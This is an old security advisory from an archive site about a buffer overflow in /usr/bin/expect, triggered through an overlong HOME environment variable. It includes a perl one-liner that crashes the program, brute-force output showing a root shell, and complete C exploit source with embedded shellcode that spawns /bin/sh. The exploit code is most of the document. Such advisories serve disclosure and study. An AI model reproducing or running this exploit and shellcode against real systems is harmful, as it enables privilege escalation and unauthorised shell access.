Vulnerability
expect
Affected
various
Description
Kevin Finisterre posted following. He found an overflow in and
coded the exploit code for several versions of /usr/bin/expect...
on SCO, linux, and BSD variants. We are unable to think of a
situation where this would be useful due to the fact that expect
is not suid... except on Cray.
[root@linux elguapo]# export HOME=`perl -e 'print "A" x 433'`
[root@linux elguapo]# expect
Segmentation fault (core dumped)
//krfinisterre@checkfree.com or dotslash@snosoft.com
//this is output from my brute script...
//722
//Stack pointer: 0xbffffa18
// Offset: 0x2d3
// Return addr: 0xbffff745
//stack/brute.sh: line 11: 2190 Illegal instruction (core dumped)
$3
$L
//723
//Stack pointer: 0xbffffa18
// Offset: 0x2d4
// Return addr: 0xbffff744
//sh-2.04#
//note that I was root when I ran this ... expect is not suid
#define BUFFERSIZE 533
unsigned long sp(void)
{
__asm__("movl %esp, %eax");
}
int main(int argc,char **argv)
{
char hell[] =
"\x29\xc0"
"\x29\xc0"
"\xb0\x47"
"\x29\xdb"
"\xb3\x0c"
"\x89\xd9"
"\xcd\x80"
"\x5e"
"\x29\xc0"
"\x88\x46\x07"
"\x89\x46\x0c"
"\x89\x76\x08"
"\xb0\x0b"
"\x87\xf3"
"\x8d\x4b\x08"
"\x8d\x53\x0c"
"\xcd\x80"
"\xe8\xe3\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68";
int i;
int offset;
long esp;
long ret;
long *addr_ptr;
char *buffer, *ptr;
offset = atoi(argv[1]);
esp = sp();
ret = esp-offset;
if(!(buffer = malloc(BUFFERSIZE)))
{
printf("oops\n");
exit(-1);
}
ptr = buffer;
addr_ptr = (long *)ptr;
for (i=0; i<BUFFERSIZE; i+=4)
*(addr_ptr++) = ret;
for (i=0; i<BUFFERSIZE/2; i++)
buffer[i] = '\xeb02';
ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2));
for(i=0; i<strlen(hell); i++)
*(ptr++) = hell[i];
buffer[BUFFERSIZE-1] = 0;
setenv("HOME", buffer, 1);
execlp("/usr/bin/expect", 0);
}
Solution
Nothing... Just keep Your expect non suid.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
